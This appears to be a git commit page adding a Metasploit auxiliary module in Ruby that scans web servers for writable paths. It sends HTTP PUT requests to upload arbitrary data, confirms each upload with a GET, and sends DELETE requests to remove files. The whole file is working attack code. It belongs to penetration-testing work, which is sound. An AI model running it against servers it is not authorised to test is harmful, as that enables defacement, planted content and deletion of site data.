Add a module to check HTTP PUT / DELETE file access. Thanks CG! Resolves 5089.
git-svn-id: file:///home/svn/framework3/trunk@13755 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
b3f29cbddf
commit
8b1fd95f66
|
@ -0,0 +1,150 @@
|
||||||
|
##
|
||||||
|
# This file is part of the Metasploit Framework and may be subject to
|
||||||
|
# redistribution and commercial restrictions. Please see the Metasploit
|
||||||
|
# Framework web site for more information on licensing and terms of use.
|
||||||
|
# http://metasploit.com/framework/
|
||||||
|
##
|
||||||
|
|
||||||
|
require 'msf/core'
|
||||||
|
|
||||||
|
class Metasploit4 < Msf::Auxiliary
|
||||||
|
|
||||||
|
# Exploit mixins should be called first
|
||||||
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
include Msf::Auxiliary::Scanner
|
||||||
|
include Msf::Auxiliary::Report
|
||||||
|
|
||||||
|
def initialize
|
||||||
|
super(
|
||||||
|
'Name' => 'HTTP Writable Path PUT/DELETE File Access',
|
||||||
|
'Version' => '$Revision$',
|
||||||
|
'Description' => %q{
|
||||||
|
This module can abuse misconfigured web servers to
|
||||||
|
upload and delete web content via PUT and DELETE HTTP
|
||||||
|
requests. Set ACTION to either PUT or DELETE. PUT is the
|
||||||
|
default.
|
||||||
|
},
|
||||||
|
'Author' =>
|
||||||
|
[
|
||||||
|
'Kashif [at] compulife.com.pk', 'CG'
|
||||||
|
],
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'References' =>
|
||||||
|
[
|
||||||
|
[ 'OSVDB', '397'],
|
||||||
|
],
|
||||||
|
'Actions' =>
|
||||||
|
[
|
||||||
|
['PUT'],
|
||||||
|
['DELETE']
|
||||||
|
],
|
||||||
|
'DefaultAction' => 'PUT'
|
||||||
|
)
|
||||||
|
|
||||||
|
register_options(
|
||||||
|
[
|
||||||
|
OptString.new('PATH', [ true, "The path to attempt to write or delete", "/msf_http_put_test.txt"]),
|
||||||
|
OptString.new('DATA', [ false, "The data to upload into the file", "msf test file"]),
|
||||||
|
], self.class)
|
||||||
|
end
|
||||||
|
|
||||||
|
def run_host(ip)
|
||||||
|
|
||||||
|
target_host = ip
|
||||||
|
target_port = datastore['RPORT']
|
||||||
|
|
||||||
|
case action.name
|
||||||
|
when 'PUT'
|
||||||
|
begin
|
||||||
|
res = send_request_cgi({
|
||||||
|
'uri' => datastore['PATH'],
|
||||||
|
'method' => 'PUT',
|
||||||
|
'ctype' => 'text/plain',
|
||||||
|
'data' => datastore['DATA']
|
||||||
|
}, 20)
|
||||||
|
|
||||||
|
if (res.nil?)
|
||||||
|
print_error("No response for #{ip}:#{rport}")
|
||||||
|
elsif (res and res.code >= 200 and res.code < 300)
|
||||||
|
|
||||||
|
#
|
||||||
|
# Detect if file was really uploaded
|
||||||
|
#
|
||||||
|
begin
|
||||||
|
res = send_request_cgi({
|
||||||
|
'uri' => datastore['PATH'],
|
||||||
|
'method' => 'GET',
|
||||||
|
'ctype' => 'text/html'
|
||||||
|
}, 20)
|
||||||
|
|
||||||
|
if (res.nil?)
|
||||||
|
print_error("no response for #{ip}:#{rport}")
|
||||||
|
elsif res and (res.code >= 200 and res.code <= 299)
|
||||||
|
if res.body.include? datastore['DATA']
|
||||||
|
print_good("Upload succeeded on #{ip}:#{rport}#{datastore['PATH']} [#{res.code}]")
|
||||||
|
report_vuln(
|
||||||
|
:host => target_host,
|
||||||
|
:port => rport,
|
||||||
|
:proto => 'tcp',
|
||||||
|
:sname => 'http',
|
||||||
|
:name => self.fullname,
|
||||||
|
:info => "PUT ENABLED",
|
||||||
|
:refs => self.references,
|
||||||
|
:exploited_at => Time.now.utc
|
||||||
|
)
|
||||||
|
end
|
||||||
|
else
|
||||||
|
print_error("Received a #{res.code} code, upload failed on #{ip}:#{rport}#{datastore['PATH']} [#{res.code} #{res.message}]")
|
||||||
|
end
|
||||||
|
|
||||||
|
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
|
||||||
|
print_error "No connection"
|
||||||
|
rescue Timeout::Error, Errno::EINVAL, Errno::ECONNRESET, EOFError, Errno::ECONNABORTED, Errno::ECONNREFUSED, Errno::EHOSTUNREACH => e
|
||||||
|
print_error e.message
|
||||||
|
end
|
||||||
|
elsif(res.code == 302 or res.code == 301)
|
||||||
|
print_status("Received #{res.code} Redirect to #{res.headers['Location']}")
|
||||||
|
else
|
||||||
|
print_error("Received #{res.code} code, upload failed on #{ip}:#{rport} #{datastore['PATH']} [#{res.code} #{res.message}]")
|
||||||
|
end
|
||||||
|
|
||||||
|
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||||
|
#print_error "No connection"
|
||||||
|
rescue Timeout::Error, Errno::EINVAL, Errno::ECONNRESET, EOFError, Errno::ECONNABORTED, Errno::ECONNREFUSED, Errno::EHOSTUNREACH => e
|
||||||
|
print_error e.message
|
||||||
|
end
|
||||||
|
|
||||||
|
when 'DELETE'
|
||||||
|
begin
|
||||||
|
res = send_request_cgi({
|
||||||
|
'uri' => datastore['PATH'],
|
||||||
|
'method' => 'DELETE'
|
||||||
|
}, 10)
|
||||||
|
|
||||||
|
return if not res
|
||||||
|
if (res and res.code >= 200 and res.code < 300)
|
||||||
|
print_good("Delete succeeded on #{ip}:#{rport}#{datastore['PATH']} [#{res.code}]")
|
||||||
|
|
||||||
|
report_vuln(
|
||||||
|
:host => target_host,
|
||||||
|
:port => rport,
|
||||||
|
:proto => 'tcp',
|
||||||
|
:sname => 'http',
|
||||||
|
:name => self.fullname,
|
||||||
|
:info => "DELETE ENABLED",
|
||||||
|
:refs => self.references,
|
||||||
|
:exploited_at => Time.now.utc
|
||||||
|
)
|
||||||
|
|
||||||
|
else
|
||||||
|
print_error("Delete failed #{ip}:#{rport} [#{res.code} #{res.message}]")
|
||||||
|
end
|
||||||
|
|
||||||
|
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
|
||||||
|
#print_error "No connection"
|
||||||
|
rescue Timeout::Error, Errno::EINVAL, Errno::ECONNRESET, EOFError, Errno::ECONNABORTED, Errno::ECONNREFUSED, Errno::EHOSTUNREACH => e
|
||||||
|
print_error e.message
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
Loading…
Reference in New Issue